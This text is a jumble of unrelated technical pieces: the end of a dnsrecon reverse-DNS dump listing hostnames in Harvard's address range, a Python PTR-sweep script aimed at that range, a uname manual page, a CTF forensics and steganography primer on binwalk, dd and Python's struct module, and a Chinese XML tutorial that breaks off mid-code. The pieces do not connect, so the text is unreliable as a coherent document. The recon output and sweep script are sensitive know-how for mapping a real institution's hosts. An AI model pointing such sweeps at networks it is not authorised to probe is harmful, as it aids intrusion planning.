eecrmiis.hks.harvard.edu 128.103.253.55 [*] PTR ksgaccman.harvard.edu 128.103.253.56 [*] PTR ksgsnoopy.hks.harvard.edu 128.103.253.56 [*] PTR innovation.harvard.edu 128.103.253.56 [*] PTR ksgexecprogram.harvard.edu 128.103.253.56 [*] PTR zuckermanfellows.harvard.edu 128.103.253.56 [*] PTR qa.www.hks.harvard.edu 128.103.253.56 [*] PTR cid.harvard.edu 128.103.253.56 [*] PTR hks.harvard.edu 128.103.253.56 [*] PTR www.hks.harvard.edu 128.103.253.56 [*] PTR www.exed.hks.harvard.edu 128.103.253.56 [*] PTR www.democracy.ash.harvard.edu 128.103.253.56 [*] PTR www.zuckermanfellows.harvard.edu 128.103.253.56 [*] PTR www2.hks.harvard.edu 128.103.253.56 [*] PTR ksglist.hks.harvard.edu 128.103.253.56 [*] PTR ksgfiona.hks.harvard.edu 128.103.253.56 [*] PTR ksgvideo.harvard.edu 128.103.253.56 [*] PTR democracy.ash.harvard.edu 128.103.253.56 [*] PTR yak.hks.harvard.edu 128.103.253.59 [*] PTR casper.hks.harvard.edu 128.103.253.61 [*] PTR autodiscover.hks17.harvard.edu 128.103.253.63 [*] PTR autodiscover.hks18.harvard.edu 128.103.253.63 [*] PTR mail.hks.harvard.edu 128.103.253.63 [*] PTR autodiscover.hks.harvard.edu 128.103.253.63 [*] PTR autodiscover.hks16.harvard.edu 128.103.253.63 [*] 17343 Records Found [*] Saving records to XML file: test.xml ``` ![dnsrecon.gif][4] [1]: https://github.com/darkoperator/dnsrecon [2]: 
http://git.kali.org/gitweb/?p=packages/dnsrecon.git;a=summary [3]: https://asciinema.org/a/31190 [4]: https://www.hackfun.org/usr/uploads/2016/10/789991485.gif
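0x03 Appendix: what `rvl` mode boils down to
-----------------

For readers who want to see the idea behind the reverse-lookup (`rvl`) mode used above, here is a minimal Python sketch of a PTR sweep. This is not how dnsrecon is implemented internally (it uses dnspython and worker threads); it only illustrates the concept, and the CIDR below is just a small slice of the range scanned above.

```python
#!/usr/bin/env python3
# Minimal sketch of a PTR sweep: walk an IPv4 range and attempt a
# reverse lookup for every address, printing any names found.
import ipaddress
import socket

def reverse_lookup(cidr):
    for ip in ipaddress.ip_network(cidr).hosts():
        try:
            name, _, _ = socket.gethostbyaddr(str(ip))
            print("[*] PTR {} {}".format(name, ip))
        except socket.herror:
            pass  # no PTR record for this address

if __name__ == "__main__":
    reverse_lookup("128.103.1.0/28")  # small slice of the range scanned above
```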
Various writeups for the [2020 AppSec-IL CTF](https://appsecil2020.ctf.today/) ([CTFTime Link](https://ctftime.org/event/1152)). Participated as part of the [JCTF team](https://jctf.team/), which came in first! ![](images/top3.png)
uname
===

Print system information.

## Synopsis

```shell
uname [OPTION]...
```

## Main purpose

- Print information about the machine and the operating system.
- When no option is given, the `-s` option is enabled by default.
- If several options or the `-a` option are given, the output fields are printed in the following order: kernel name, hostname, kernel release, kernel version, machine name, processor, hardware platform, operating system.

## Options

```shell
-a, --all                 Print all information, in the order above, omitting -p and -i if unknown.
-s, --kernel-name         Print the kernel name.
-n, --nodename            Print the network node hostname.
-r, --kernel-release      Print the kernel release.
-v, --kernel-version      Print the kernel version.
-m, --machine             Print the machine hardware name.
-p, --processor           Print the processor type.
-i, --hardware-platform   Print the hardware platform.
-o, --operating-system    Print the operating system.
--help                    Display help information and exit.
--version                 Display version information and exit.
```

## Return value

Returns 0 on success; a non-zero value indicates failure.

## Examples

```shell
# Running uname alone is equivalent to uname -s
[root@localhost ~]# uname
Linux
```

```shell
# Show all information
[root@localhost ~]# uname -a
Linux localhost 2.6.18-348.6.1.el5 #1 SMP Tue May 21 15:34:22 EDT 2013 i686 i686 i386 GNU/Linux
```

```shell
# List the fields one by one
[root@localhost ~]# uname -m
i686

[root@localhost ~]# uname -n
localhost

[root@localhost ~]# uname -r
2.6.18-4-686

[root@localhost ~]# uname -s
Linux

[root@localhost ~]# uname -v
#1 SMP Tue May 21 15:34:22 EDT 2013

[root@localhost ~]# uname -p
i686

[root@localhost ~]# uname -i
i386

[root@localhost ~]# uname -o
GNU/Linux
```

### Notes

1. This command is part of the `GNU coreutils` package; for related help see `man -s 1 uname` and `info coreutils 'uname invocation'`.
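When scripting, the same fields that `uname` prints are also exposed by Python's standard library. A minimal sketch:

```python
#!/usr/bin/env python3
# Reading the same fields as `uname -a` from Python, via the standard
# library's platform module (no external dependencies).
import platform

u = platform.uname()
print(u.system)    # kernel name, like `uname -s`
print(u.node)      # network node hostname, like `uname -n`
print(u.release)   # kernel release, like `uname -r`
print(u.version)   # kernel version, like `uname -v`
print(u.machine)   # machine hardware name, like `uname -m`
```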
### Prerequisite techniques for forensics and steganography

In most CTF competitions, forensics and steganography are inseparable, and the knowledge the two require is complementary, so both are introduced here together.

Any challenge that asks you to examine a static data file in order to extract hidden information can be considered a forensics/steganography challenge (unless it is purely a cryptography problem). Low-score stego/forensics challenges are often combined with classical ciphers, while high-score ones are usually combined with more complex modern cryptography, which nicely reflects the character of Misc challenges.

### Prerequisite skills

- Understand common encodings

  Be able to decode the encodings that appear in a file, develop a certain sensitivity to special encodings (Base64, hexadecimal, binary, etc.), and convert them to obtain the final flag.

- Be able to use a scripting language (Python, etc.) to manipulate binary data
- Know the formats of common files well, especially the various [file signatures](https://en.wikipedia.org/wiki/List_of_file_signatures), protocols, structures, etc.
- Use common tools flexibly

### The struct module for manipulating binary data in Python

Sometimes you need to process binary data in Python, for example when reading and writing files or during socket operations. In such cases you can use Python's struct module.

The three most important functions in the struct module are `pack()`, `unpack()` and `calcsize()`:

- `pack(fmt, v1, v2, ...)` packs the data into a string (actually a byte stream similar to a C struct) according to the given format (fmt)
- `unpack(fmt, string)` parses the byte stream string according to the given format (fmt) and returns the parsed tuple
- `calcsize(fmt)` calculates how many bytes of memory the given format (fmt) occupies

The pack format `fmt` determines how the variables are packed into the byte stream; it consists of a series of format characters. The meanings of the individual format characters are not listed here; for details refer to the [Python Doc](https://docs.python.org/2/library/struct.html)

```python
>>> import struct
>>> struct.pack('>I',16)
'\x00\x00\x00\x10'
```

The first argument of `pack` is the processing instruction. `'>I'` means: `>` indicates that the byte order is Big-Endian, i.e. network order, and `I` indicates a 4-byte unsigned integer.

The number of following arguments must match the processing instruction.

Read the first 30 bytes of a BMP file. The file header structure, in order, is:

- two bytes: `BM` indicates a Windows bitmap, `BA` indicates an OS/2 bitmap
- a 4-byte integer: the size of the bitmap
- a 4-byte integer: reserved, always 0
- a 4-byte integer: offset of the actual image data
- a 4-byte integer: number of bytes in the header
- a 4-byte integer: image width
- a 4-byte integer: image height
- a 2-byte integer: always 1
- a 2-byte integer: number of colors

```python
>>> import struct
>>> bmp = '\x42\x4d\x38\x8c\x0a\x00\x00\x00\x00\x00\x36\x00\x00\x00\x28\x00\x00\x00\x80\x02\x00\x00\x68\x01\x00\x00\x01\x00\x18\x00'
>>> struct.unpack('<ccIIIIIIHH',bmp)
('B', 'M', 691256, 0, 54, 40, 640, 360, 1, 24)
```

### The bytearray type for manipulating binary data in Python

Read a file as a binary array:

```python
data = bytearray(open('challenge.png', 'rb').read())
```

A byte array is simply a mutable version of bytes:

```python
data[0] = '\x89'
```

## Common tools for manipulating binary data

### [010 Editor](http://www.sweetscape.com/010editor/)

SweetScape 010 Editor is a brand-new hexadecimal file editor. It differs from traditional hex editors in that it can parse binary files with "templates", letting you read and edit them. It can also compare any visible binary files.

With its template feature it is very easy to inspect the concrete internal structure of a file and quickly modify its contents accordingly.

### The `file` command

The `file` command identifies a file's type by its header (magic bytes).

```shell
root in ~/Desktop/tmp
λ file flag
flag: PNG image data, 450 x 450, 8-bit grayscale, non-interlaced
```

### The `strings` command

Prints the printable characters in a file. It is often used to discover hint messages or specially encoded information in a file, and frequently provides the entry point into a challenge.

- It can be combined with the `grep` command to search for specific information

```shell
strings test|grep -i XXCTF
```

- It can also be combined with the `-o` option to get the offset of every ASCII string

```shell
root in ~/Desktop/tmp
λ strings -o flag|head
     14 IHDR
     45 gAMA
     64 cHRM
    141 bKGD
    157 tIME
    202 IDATx
    223 NFdVK3
    361 |;*-
    410 Ge%<W
    431 5duX@%
```

### The `binwalk` command

binwalk is originally a firmware analysis tool; in competitions it is commonly used to discover multiple files glued together. It identifies files embedded inside another file by their signatures; false positives sometimes occur (especially with files such as Pcap traffic captures).

```shell
root in ~/Desktop/tmp
λ binwalk flag

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 450 x 450, 8-bit grayscale, non-interlaced
134           0x86            Zlib compressed data, best compression
25683         0x6453          Zip archive data, at least v2.0 to extract, compressed size: 675, uncompressed size: 1159, name: readme.txt
26398         0x671E          Zip archive data, at least v2.0 to extract, compressed size: 430849, uncompressed size: 1027984, name: trid
457387        0x6FAAB         End of Zip archive
```

With the `-e` option it can perform automated extraction.

You can also combine it with the `dd` command to carve files out manually.

```shell
root in ~/Desktop/tmp
λ dd if=flag of=1.zip bs=1 skip=25683
431726+0 records in
431726+0 records out
431726 bytes (432 kB, 422 KiB) copied, 0.900973 s, 479 kB/s
```
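To make the binwalk + `dd` workflow above concrete, here is a minimal Python sketch that finds an embedded ZIP by its magic bytes and carves it out. It assumes, as in the example above, that the archive extends to the end of the host file.

```python
#!/usr/bin/env python
# A hand-rolled version of the binwalk + dd workflow: scan a file for the
# ZIP local-file-header signature and carve everything from the first hit
# to the end of the file.
ZIP_MAGIC = b"PK\x03\x04"

data = bytearray(open("flag", "rb").read())

offset = data.find(ZIP_MAGIC)
if offset != -1:
    print("ZIP signature found at offset 0x%x" % offset)
    with open("1.zip", "wb") as out:
        out.write(data[offset:])  # same effect as: dd if=flag of=1.zip bs=1 skip=<offset>
else:
    print("no ZIP signature found")
```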
# XML 学习笔记 --- ## 概述 XML 用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML 文档结构包括 XML 声明、DTD 文档类型定义(可选)、文档元素。 XML 无所不在. ```xml <!-- XML声明 --> <?xml version="1.0" encoding="UTF-8"?> <!-- 文档类型定义 --> <!DOCTYPE note[ <!ELEMENT note (to,from,heading,body)> <!ELEMENT to (#PCDATA)> <!ELEMENT from (#PCDATA)> <!ELEMENT heading (#PCDATA)> <!ELEMENT body (#PCDATA)> ]> <!-- 文档元素 --> <note> <to>Tove</to> <from>Jani</from> <heading>Reminder</heading> <body>Don't forget me this weekend!</body> </note> ``` --- ### 用途 XML 应用于 Web 开发的许多方面,常用于简化数据的存储和共享。 **XML 把数据从 HTML 分离** 如果你需要在 HTML 文档中显示动态数据,那么每当数据改变时将花费大量的时间来编辑 HTML。 通过 XML,数据能够存储在独立的 XML 文件中。这样你就可以专注于使用 HTML/CSS 进行显示和布局,并确保修改底层数据不再需要对 HTML 进行任何的改变。 通过使用几行 JavaScript 代码,你就可以读取一个外部 XML 文件,并更新你的网页的数据内容。 **XML 简化数据共享** 在真实的世界中,计算机系统和数据使用不兼容的格式来存储数据。 XML 数据以纯文本格式进行存储,因此提供了一种独立于软件和硬件的数据存储方法。 这让创建不同应用程序可以共享的数据变得更加容易。 **XML 简化数据传输** 对开发人员来说,其中一项最费时的挑战一直是在互联网上的不兼容系统之间交换数据。 由于可以通过各种不兼容的应用程序来读取数据,以 XML 交换数据降低了这种复杂性。 **XML 简化平台变更** 升级到新的系统(硬件或软件平台),总是非常费时的。必须转换大量的数据,不兼容的数据经常会丢失。 XML 数据以文本格式存储。这使得 XML 在不损失数据的情况下,更容易扩展或升级到新的操作系统、新的应用程序或新的浏览器。 **XML 使你的数据更有用** 不同的应用程序都能够访问你的数据,不仅仅在 HTML 页中,也可以从 XML 数据源中进行访问。 通过 XML,你的数据可供各种阅读设备使用(掌上计算机、语音设备、新闻阅读器等),还可以供盲人或其他残障人士使用。 **XML 用于创建新的互联网语言** 很多新的互联网语言是通过 XML 创建的。 这里有一些实例: - XHTML - 用于描述可用的 Web 服务 的 WSDL - 作为手持设备的标记语言的 WAP 和 WML - 用于新闻 feed 的 RSS 语言 - 描述资本和本体的 RDF 和 OWL - 用于描述针针对 Web 的多媒体 的 SMIL --- ### XML 和 HTML 之间的差异 XML 和 HTML 为不同的目的而设计: - XML 被设计用来传输和存储数据,其焦点是数据的内容。 - HTML 被设计用来显示数据,其焦点是数据的外观。 XML 不会做任何事情 - HTML 旨在显示信息,而 XML 旨在传输信息,XML 不会做任何事情. 通过 XML 你可以发明自己的标签 - 这是因为 XML 语言没有预定义的标签。 - HTML 中使用的标签都是预定义的。HTML 文档只能使用在 HTML 标准中定义过的标签(如 `<p>`、`<h1>` 等等)。 - XML 允许创作者定义自己的标签和自己的文档结构。 XML 不是对 HTML 的替代 - XML 是对 HTML 的补充。 - XML 不会替代 HTML,理解这一点很重要。在大多数 Web 应用程序中,XML 用于传输数据,而 HTML 用于格式化并显示数据。 --- ## 语法 XML 的语法规则很简单,且很有逻辑。这些规则很容易学习,也很容易使用。 **XML 文档必须有根元素** XML 必须包含根元素,它是所有其他元素的父元素,比如以下实例中 root 就是根元素: ```xml <root> <child> <subchild>.....</subchild> </child> </root> ``` 以下实例中 note 是根元素: ```xml <?xml version="1.0" encoding="UTF-8"?> <note> <to>Tove</to> <from>Jani</from> <heading>Reminder</heading> <body>Don't forget me this weekend!</body> </note> ``` **XML 声明** XML 声明文件的可选部分,如果存在需要放在文档的第一行,如下所示: ```xml <?xml version="1.0" encoding="utf-8"?> ``` 以上实例包含 XML 版本( UTF-8 也是 HTML5, CSS, JavaScript, PHP, 和 SQL 的默认编码。 如果以类似 `<!DOCTYPE note SYSTEM "book.dtd">` 声明的是文档定义类型(DTD:Document Type Definition),DTD 是可选的。 **所有的 XML 元素都必须有一个关闭标签** 在 HTML 中,某些元素不必有一个关闭标签: ```xml <p>This is a paragraph. 
<br> ``` 在 XML 中,省略关闭标签是非法的。所有元素都必须有关闭标签: ```xml <p>This is a paragraph.</p> <br /> ``` 注释:从上面的实例中,你也许已经注意到 XML 声明没有关闭标签。这不是错误。声明不是 XML 文档本身的一部分,它没有关闭标签。 **XML 标签对大小写敏感** XML 标签对大小写敏感。标签 `<Letter>` 与标签 `<letter>` 是不同的。 必须使用相同的大小写来编写打开标签和关闭标签: ```xml <Message>这是错误的</message> <message>这是正确的</message> ``` 注释:打开标签和关闭标签通常被称为开始标签和结束标签。不论你喜欢哪种术语,它们的概念都是相同的。 **XML 必须正确嵌套** 在 HTML 中,常会看到没有正确嵌套的元素: ```xml <b><i>This text is bold and italic</b></i> ``` 在 XML 中,所有元素都必须彼此正确地嵌套: ```xml <b><i>This text is bold and italic</i></b> ``` 在上面的实例中,正确嵌套的意思是:由于 `<i>` 元素是在 `<b>` 元素内打开的,那么它必须在 `<b>` 元素内关闭。 **XML 属性值必须加引号** 与 HTML 类似,XML 元素也可拥有属性(名称/值的对)。 在 XML 中,XML 的属性值必须加引号。 请研究下面的两个 XML 文档。 第一个是错误的,第二个是正确的: ```xml <note date=12/11/2007> <to>Tove</to> <from>Jani</from> </note> ``` ```xml <note date="12/11/2007"> <to>Tove</to> <from>Jani</from> </note> ``` 在第一个文档中的错误是,note 元素中的 date 属性没有加引号。 **实体引用** 在 XML 中,一些字符拥有特殊的意义。 如果你把字符 "<" 放在 XML 元素中,会发生错误,这是因为解析器会把它当作新元素的开始。 这样会产生 XML 错误: ```xml <message>if salary < 1000 then</message> ``` 为了避免这个错误,请用实体引用来代替 "<" 字符: ```xml <message>if salary &lt; 1000 then</message> ``` 在 XML 中,有 5 个预定义的实体引用: | 实体符号 | 字符 | 含义 | | - | - | - | | &lt; | < | less than | | &gt; | > | greater than | | &amp; | & | ampersand | | &apos; | ' | apostrophe | | &quot; | " | quotation mark | 注释:在 XML 中,只有字符 "<" 和 "&" 确实是非法的。大于号是合法的,但是用实体引用来代替它是一个好习惯。 **XML 中的注释** 在 XML 中编写注释的语法与 HTML 的语法很相似。 ```xml <!-- This is a comment --> ``` **在 XML 中,空格会被保留** HTML 会把多个连续的空格字符裁减(合并)为一个: HTML: ```html Hello Tove ``` 输出结果: ```html Hello Tove ``` 在 XML 中,文档中的空格不会被删减。 **XML 以 LF 存储换行** 在 Windows 应用程序中,换行通常以一对字符来存储:回车符(CR)和换行符(LF)。 在 Unix 和 Mac OSX 中,使用 LF 来存储新行。 在旧的 Mac 系统中,使用 CR 来存储新行。 XML 以 LF 存储换行。 --- ## 树结构 XML 文档形成了一种树结构,它从"根部"开始,然后扩展到"枝叶"。 ```xml <?xml version="1.0" encoding="UTF-8"?> <note> <to>Tove</to> <from>Jani</from> <heading>Reminder</heading> <body>Don't forget me this weekend!</body> </note> ``` 第一行是 XML 声明。它定义 XML 的版本(1.0)和所使用的编码(UTF-8 : 万国码, 可显示各种语言)。 下一行描述文档的根元素(像在说:"本文档是一个便签"): ```xml <note> ``` 接下来 4 行描述根的 4 个子元素(to, from, heading 以及 body): ```xml <to>Tove</to> <from>Jani</from> <heading>Reminder</heading> <body>Don't forget me this weekend!</body> ``` 最后一行定义根元素的结尾: ```xml </note> ``` 你可以假设,从这个实例中,XML 文档包含了一张 Jani 写给 Tove 的便签。 XML 文档必须包含根元素。该元素是所有其他元素的父元素。 XML 文档中的元素形成了一棵文档树。这棵树从根部开始,并扩展到树的最底端。 所有的元素都可以有子元素: ``` <root> <child> <subchild>.....</subchild> </child> </root> ``` 父、子以及同胞等术语用于描述元素之间的关系。父元素拥有子元素。相同层级上的子元素成为同胞(兄弟或姐妹)。 所有的元素都可以有文本内容和属性(类似 HTML 中)。 例如: ```xml <bookstore> <book category="COOKING"> <title lang="en">Everyday Italian</title> <author>Giada De Laurentiis</author> <year>2005</year> <price>30.00</price> </book> <book category="CHILDREN"> <title lang="en">Harry Potter</title> <author>J K. Rowling</author> <year>2005</year> <price>29.99</price> </book> <book category="WEB"> <title lang="en">Learning XML</title> <author>Erik T. 
Ray</author> <year>2003</year> <price>39.95</price> </book> </bookstore> ``` 实例中的根元素是 `<bookstore>`。文档中的所有 `<book>` 元素都被包含在 `<bookstore>` 中。 `<book>` 元素有 4 个子元素:`<title>`、`<author>`、`<year>`、`<price>`。 --- ### XML 文档的构建模块 所有的 XML 文档(以及 HTML 文档)均由以下简单的构建模块构成: - 元素 元素是 XML 以及 HTML 文档的主要构建模块,元素可包含文本、其他元素或者是空的。 实例: ```xml <body>body text in between</body> <message>some message in between</message> ``` 空的 HTML 元素的例子是 "hr"、"br" 以及 "img"。 - 属性 属性可提供有关元素的额外信息 实例: ```xml <img src="computer.gif" /> ``` - 实体 实体是用来定义普通文本的变量。实体引用是对实体的引用。 - PCDATA PCDATA 的意思是被解析的字符数据(parsed character data)。 PCDATA 是会被解析器解析的文本。这些文本将被解析器检查实体以及标记。 - CDATA CDATA 的意思是字符数据(character data)。 CDATA 是不会被解析器解析的文本。 --- ### 元素 **什么是 XML 元素?** XML 元素指的是从(且包括)开始标签直到(且包括)结束标签的部分。 一个元素可以包含: - 其他元素 - 文本 - 属性 - 或混合以上所有... ```xml <bookstore> <book category="CHILDREN"> <title>Harry Potter</title> <author>J K. Rowling</author> <year>2005</year> <price>29.99</price> </book> <book category="WEB"> <title>Learning XML</title> <author>Erik T. Ray</author> <year>2003</year> <price>39.95</price> </book> </bookstore> ``` 在上面的实例中,`<bookstore>` 和 `<book>` 都有元素内容,因为他们包含其他元素。`<book>` 元素也有属性(category="CHILDREN")。`<title>`、`<author>`、`<year>` 和 `<price>` 有文本内容,因为他们包含文本。 **XML 命名规则** XML 元素必须遵循以下命名规则: - 名称可以包含字母、数字以及其他的字符 - 名称不能以数字或者标点符号开始 - 名称不能以字母 xml(或者 XML、Xml 等等)开始 - 名称不能包含空格 可使用任何名称,没有保留的字词。 **最佳命名习惯** 使名称具有描述性。使用下划线的名称也很不错:`<first_name>`、`<last_name>`。 名称应简短和简单,比如:`<book_title>`,而不是:`<the_title_of_the_book>`。 避免 "-" 字符。如果你按照这样的方式进行命名:"first-name",一些软件会认为你想要从 first 里边减去 name。 避免 "." 字符。如果你按照这样的方式进行命名:"first.name",一些软件会认为 "name" 是对象 "first" 的属性。 避免 ":" 字符。冒号会被转换为命名空间来使用(稍后介绍)。 XML 文档经常有一个对应的数据库,其中的字段会对应 XML 文档中的元素。有一个实用的经验,即使用数据库的命名规则来命名 XML 文档中的元素。 在 XML 中,éòá 等非英语字母是完全合法的,不过需要留意,你的软件供应商不支持这些字符时可能出现的问题。 **XML 元素是可扩展的** XML 元素是可扩展,以携带更多的信息。 请看下面的 XML 实例: ```xml <note> <to>Tove</to> <from>Jani</from> <body>Don't forget me this weekend!</body> </note> ``` 让我们设想一下,我们创建了一个应用程序,可将 `<to>`、`<from>` 以及 `<body>` 元素从 XML 文档中提取出来,并产生以下的输出: MESSAGE ``` To: Tove From: Jani Don't forget me this weekend! ``` 想象一下,XML 文档的作者添加的一些额外信息: ```xml <note> <date>2008-01-10</date> <to>Tove</to> <from>Jani</from> <heading>Reminder</heading> <body>Don't forget me this weekend!</body> </note> ``` 那么这个应用程序会中断或崩溃吗? 不会。这个应用程序仍然可以找到 XML 文档中的 `<to>`、`<from>` 以及 `<body>` 元素,并产生同样的输出。 XML 的优势之一,就是可以在不中断应用程序的情况下进行扩展。 ### 属性 XML 元素具有属性,类似 HTML。 属性(Attribute)提供有关元素的额外信息。 **XML 属性** 在 HTML 中,属性提供有关元素的额外信息: ```xml <img src="computer.gif"> <a href="demo.html"> ``` 属性通常提供不属于数据组成部分的信息。在下面的实例中,文件类型与数据无关,但是对需要处理这个元素的软件来说却很重要: ```xml <file type="gif">computer.gif</file> ``` **XML 属性必须加引号** 属性值必须被引号包围,不过单引号和双引号均可使用。比如一个人的性别,`person` 元素可以这样写: ```xml <person sex="female"> ``` 或者这样也可以: ```xml <person sex='female'> ``` 如果属性值本身包含双引号,你可以使用单引号,就像这个实例: ```xml <gangster name='George "Shotgun" Ziegler'> ``` 或者你可以使用字符实体: ```xml <gangster name="George &quot;Shotgun&quot; Ziegler"> ``` XML 元素 vs. 
属性 请看这些实例: ```xml <person sex="female"> <firstname>Anna</firstname> <lastname>Smith</lastname> </person> ``` ```xml <person> <sex>female</sex> <firstname>Anna</firstname> <lastname>Smith</lastname> </person> ``` 在第一个实例中,sex 是一个属性。在第二个实例中,sex 是一个元素。这两个实例都提供相同的信息。 没有什么规矩可以告诉我们什么时候该使用属性,而什么时候该使用元素。我的经验是在 HTML 中,属性用起来很便利,但是在 XML 中,你应该尽量避免使用属性。如果信息感觉起来很像数据,那么请使用元素。 下面的三个 XML 文档包含完全相同的信息: 第一个实例中使用了 date 属性: ```xml <note date="10/01/2008"> <to>Tove</to> <from>Jani</from> <heading>Reminder</heading> <body>Don't forget me this weekend!</body> </note> ``` 第二个实例中使用了 date 元素: ```xml <note> <date>10/01/2008</date> <to>Tove</to> <from>Jani</from> <heading>Reminder</heading> <body>Don't forget me this weekend!</body> </note> ``` 第三个实例中使用了扩展的 date 元素: ```xml <note> <date> <day>10</day> <month>01</month> <year>2008</year> </date> <to>Tove</to> <from>Jani</from> <heading>Reminder</heading> <body>Don't forget me this weekend!</body> </note> ``` **避免 XML 属性?** 因使用属性而引起的一些问题: - 属性不能包含多个值(元素可以) - 属性不能包含树结构(元素可以) - 属性不容易扩展(为未来的变化) 属性难以阅读和维护。请尽量使用元素来描述数据。而仅仅使用属性来提供与数据无关的信息。 不要做这样的蠢事(这不是 XML 应该被使用的方式): ```xml <note day="10" month="01" year="2008" to="Tove" from="Jani" heading="Reminder" body="Don't forget me this weekend!"> </note> ``` **针对元数据的 XML 属性** 有时候会向元素分配 ID 引用。这些 ID 索引可用于标识 XML 元素,它起作用的方式与 HTML 中 id 属性是一样的。这个实例向我们演示了这种情况: ```xml <messages> <note id="501"> <to>Tove</to> <from>Jani</from> <heading>Reminder</heading> <body>Don't forget me this weekend!</body> </note> <note id="502"> <to>Jani</to> <from>Tove</from> <heading>Re: Reminder</heading> <body>I will not</body> </note> </messages> ``` 上面的 id 属性仅仅是一个标识符,用于标识不同的便签。它并不是便签数据的组成部分。 元数据(有关数据的数据)应当存储为属性,而数据本身应当存储为元素。 --- ## 格式验证 拥有正确语法的 XML 被称为"形式良好"的 XML。 通过 DTD 验证的 XML 是"合法"的 XML。 **验证 XML 文档** 合法的 XML 文档是"形式良好"的 XML 文档,这也符合文档类型定义(DTD)的规则: ```xml <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE note SYSTEM "Note.dtd"> <note> <to>Tove</to> <from>Jani</from> <heading>Reminder</heading> <body>Don't forget me this weekend!</body> </note> ``` 在上面的实例中,DOCTYPE 声明是对外部 DTD 文件的引用。下面的段落展示了这个文件的内容。 **XML DTD** DTD 的目的是定义 XML 文档的结构。它使用一系列合法的元素来定义文档结构: ```xml <!DOCTYPE note [ <!ELEMENT note (to,from,heading,body)> <!ELEMENT to (#PCDATA)> <!ELEMENT from (#PCDATA)> <!ELEMENT heading (#PCDATA)> <!ELEMENT body (#PCDATA)> ]> ``` **XML Schema** W3C 支持一种基于 XML 的 DTD 代替者,它名为 XML Schema: ```xml <xs:element name="note"> <xs:complexType> <xs:sequence> <xs:element name="to" type="xs:string"/> <xs:element name="from" type="xs:string"/> <xs:element name="heading" type="xs:string"/> <xs:element name="body" type="xs:string"/> </xs:sequence> </xs:complexType> </xs:element> ``` --- ### 查看 XML 文件 在所有主流的浏览器中,均能够查看原始的 XML 文件。 不要指望 XML 文件会直接显示为 HTML 页面。 **查看 XML 文件** ```xml <?xml version="1.0" encoding="ISO-8859-1"?> <!-- Edited by XMLSpy® --> <note> <to>Tove</to> <from>Jani</from> <heading>Reminder</heading> <body>Don't forget me this weekend!</body> </note> ``` 这个 XML 在浏览器中显示是这样的 XML 文档将显示为代码颜色化的根以及子元素。通过点击元素左侧的加号(+)或减号( - ),可以展开或收起元素的结构。要查看原始的 XML 源(不包括 + 和 - 符号),选择"查看页面源代码"或从浏览器菜单"查看源文件"。 如果一个错误的XML文件被打开,浏览器会报告错误。 **XML CSS** 通过使用 CSS(Cascading Style Sheets 层叠样式表),你可以添加显示信息到 XML 文档中。 原始 XML CSS CSS + XML 下面是 XML 文件的一小部分。第二行把 XML 文件链接到 CSS 文件: ```xml <?xml version="1.0" encoding="ISO-8859-1"?> <?xml-stylesheet type="text/css" href="cd_catalog.css"?> <CATALOG> <CD> <TITLE>Empire Burlesque</TITLE> <ARTIST>Bob Dylan</ARTIST> <COUNTRY>USA</COUNTRY> <COMPANY>Columbia</COMPANY> <PRICE>10.90</PRICE> <YEAR>1985</YEAR> </CD> <CD> <TITLE>Hide your heart</TITLE> <ARTIST>Bonnie Tyler</ARTIST> 
<COUNTRY>UK</COUNTRY> <COMPANY>CBS Records</COMPANY> <PRICE>9.90</PRICE> <YEAR>1988</YEAR> </CD> . . . </CATALOG> ``` 使用 CSS 格式化 XML 不是常用的方法,W3C 推荐使用 XSLT. **XML XSLT** XSLT 是首选的 XML 样式表语言。 XSLT(eXtensible Stylesheet Language Transformations)远比 CSS 更加完善。 XSLT 是在浏览器显示 XML 文件之前,先把它转换为 HTML: XSLT 文件 在上面的实例中,当浏览器读取 XML 文件时,XSLT 转换是由浏览器完成的。 在使用 XSLT 来转换 XML 时,不同的浏览器可能会产生不同结果。为了减少这种问题,可以在服务器上进行 XSLT 转换。 --- ## XML JavaScript ### XML HTTP Request **XMLHttpRequest 对象** XMLHttpRequest 对象用于在后台与服务器交换数据。 创建一个 XMLHttpRequest 对象 所有现代浏览器(IE7+、Firefox、Chrome、Safari 和 Opera)都有内建的 XMLHttpRequest 对象。 创建 XMLHttpRequest 对象的语法: ```js xmlhttp=new XMLHttpRequest(); ``` 旧版本的Internet Explorer(IE5和IE6)中使用 ActiveX 对象: ```js xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); ``` ### XML Parser 所有现代浏览器都有内建的 XML 解析器。 XML 解析器把 XML 文档转换为 XML DOM 对象 - 可通过 JavaScript 操作的对象。 **解析 XML 文档** 下面的代码片段把 XML 文档解析到 XML DOM 对象中: ```js if (window.XMLHttpRequest) {// code for IE7+, Firefox, Chrome, Opera, Safari xmlhttp=new XMLHttpRequest(); } else {// code for IE6, IE5 xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); } xmlhttp.open("GET","books.xml",false); xmlhttp.send(); xmlDoc=xmlhttp.responseXML; ``` **解析 XML 字符串** 下面的代码片段把 XML 字符串解析到 XML DOM 对象中: ```js txt="<bookstore><book>"; txt=txt+"<title>Everyday Italian</title>"; txt=txt+"<author>Giada De Laurentiis</author>"; txt=txt+"<year>2005</year>"; txt=txt+"</book></bookstore>"; if (window.DOMParser) { parser=new DOMParser(); xmlDoc=parser.parseFromString(txt,"text/xml"); } else // Internet Explorer { xmlDoc=new ActiveXObject("Microsoft.XMLDOM"); xmlDoc.async=false; xmlDoc.loadXML(txt); } ``` **跨域访问** 出于安全方面的原因,现代的浏览器不允许跨域的访问。 这意味着,网页以及它试图加载的 XML 文件,都必须位于相同的服务器上。 --- ### XML DOM XML DOM(XML Document Object Model)定义了访问和操作 XML 文档的标准方法。 XML DOM 把 XML 文档作为树结构来查看。 所有元素可以通过 DOM 树来访问。可以修改或删除它们的内容,并创建新的元素。元素,它们的文本,以及它们的属性,都被认为是节点。 **加载一个 XML 文件 - 跨浏览器实例** 下面的实例把 XML 文档("note.xml")解析到 XML DOM 对象中,然后通过 JavaScript 提取一些信息: ```html <!DOCTYPE html> <html> <body> <h1>W3Cschool Internal Note</h1> <div> <b>To:</b> <span id="to"></span><br> <b>From:</b> <span id="from"></span><br> <b>Message:</b> <span id="message"></span> </div> <script> if (window.XMLHttpRequest) {// code for IE7+, Firefox, Chrome, Opera, Safari xmlhttp=new XMLHttpRequest(); } else {// code for IE6, IE5 xmlhttp=new 